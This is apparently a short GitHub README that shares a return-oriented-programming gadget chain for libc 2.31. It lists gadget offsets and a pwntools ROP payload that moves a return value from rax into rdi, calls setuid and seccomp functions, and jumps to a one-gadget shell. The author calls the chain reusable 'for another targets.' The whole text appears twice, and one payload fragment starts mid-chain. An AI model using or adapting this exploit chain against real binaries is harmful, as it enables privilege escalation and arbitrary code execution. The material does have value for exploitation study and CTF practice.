echel0nn/rax_into_rdi

## rax_into_rdi
if you need one value from a function in libc 2.31 there is one chain that can transfer from rax to rbx then move to rdi, it can be used perfectly.
    # 0x000000000011c371: pop rdx; pop r12; ret;
    POP_RDX = int(libc.address) + 0x000000000011C371
    POP_RSI = int(libc.address) + 0x0000000000027529
    POP_RDI = int(libc.address) + 0x0000000000026B72
    PUSH_RAX = int(libc.address) + 0x0000000000151841
    POP_RAX = int(libc.address) + 0x000000000004a550
    MOV_RDI_RBX = int(libc.address) + 0x0000000000083dd1 # mov rdi, rbx; call rax
    SYSCALL = int(libc.address) + 0x0000000000066229 # syscall; ret
    PUSH_RSP = int(libc.address) + 0x000000000004543d # push rsp; ret
    rbp = int(libc.address) + 0x1ef000

    i've tried to disable seccomp but it failed miserably but the chain can be used for another targets.

       ...
       + p64(POP_RSI)
        + p64(SCMP_ACT_ALLOW)
        + p64(POP_RDX)
        + p64(0x3b) # execve to rdx
        + p64(0x0) # pop r12
        + p64(POP_RAX)
        + p64(exe.plt["seccomp_rule_add"])
        + p64(MOV_RDI_RBX)
        + p64(0x0)
        + p64(0x0)
        + p64(POP_RDX)


    rop3 = (
        p64(POP_RDI)
        + p64(0x0)
        + p64(SETUID)
        + p64(POP_RDI)
        + p64(SCMP_ACT_ALLOW)
        + p64(exe.plt["seccomp_init"])
        + p64(PUSH_RAX)
        + p64(0x0) # pop rbp
        + p64(0x0) # pop r12
        + p64(POP_RSI)
        + p64(SCMP_ACT_ALLOW)
        + p64(POP_RDX)
        + p64(0x3b) # execve to rdx
        + p64(0x0) # pop r12
        + p64(POP_RAX)
        + p64(exe.plt["seccomp_load"])
        + p64(MOV_RDI_RBX)
        + p64(0x0)
        + p64(0x0)
        + p64(POP_RDX)
        + p64(0x0)
        + p64(0x0)
        + p64(POP_RSI)
        + p64(0x0)
        + p64(ONE_GADGET)
    )
	if you need one value from a function in libc 2.31 there is one chain that can transfer from rax to rbx then move to rdi, it can be used perfectly.
	# 0x000000000011c371: pop rdx; pop r12; ret;
	POP_RDX = int(libc.address) + 0x000000000011C371
	POP_RSI = int(libc.address) + 0x0000000000027529
	POP_RDI = int(libc.address) + 0x0000000000026B72
	PUSH_RAX = int(libc.address) + 0x0000000000151841
	POP_RAX = int(libc.address) + 0x000000000004a550
	MOV_RDI_RBX = int(libc.address) + 0x0000000000083dd1 # mov rdi, rbx; call rax
	SYSCALL = int(libc.address) + 0x0000000000066229 # syscall; ret
	PUSH_RSP = int(libc.address) + 0x000000000004543d # push rsp; ret
	rbp = int(libc.address) + 0x1ef000

	i've tried to disable seccomp but it failed miserably but the chain can be used for another targets.

	...
	+ p64(POP_RSI)
	+ p64(SCMP_ACT_ALLOW)
	+ p64(POP_RDX)
	+ p64(0x3b) # execve to rdx
	+ p64(0x0) # pop r12
	+ p64(POP_RAX)
	+ p64(exe.plt["seccomp_rule_add"])
	+ p64(MOV_RDI_RBX)
	+ p64(0x0)
	+ p64(0x0)
	+ p64(POP_RDX)


	rop3 = (
	p64(POP_RDI)
	+ p64(0x0)
	+ p64(SETUID)
	+ p64(POP_RDI)
	+ p64(SCMP_ACT_ALLOW)
	+ p64(exe.plt["seccomp_init"])
	+ p64(PUSH_RAX)
	+ p64(0x0) # pop rbp
	+ p64(0x0) # pop r12
	+ p64(POP_RSI)
	+ p64(SCMP_ACT_ALLOW)
	+ p64(POP_RDX)
	+ p64(0x3b) # execve to rdx
	+ p64(0x0) # pop r12
	+ p64(POP_RAX)
	+ p64(exe.plt["seccomp_load"])
	+ p64(MOV_RDI_RBX)
	+ p64(0x0)
	+ p64(0x0)
	+ p64(POP_RDX)
	+ p64(0x0)
	+ p64(0x0)
	+ p64(POP_RSI)
	+ p64(0x0)
	+ p64(ONE_GADGET)
	)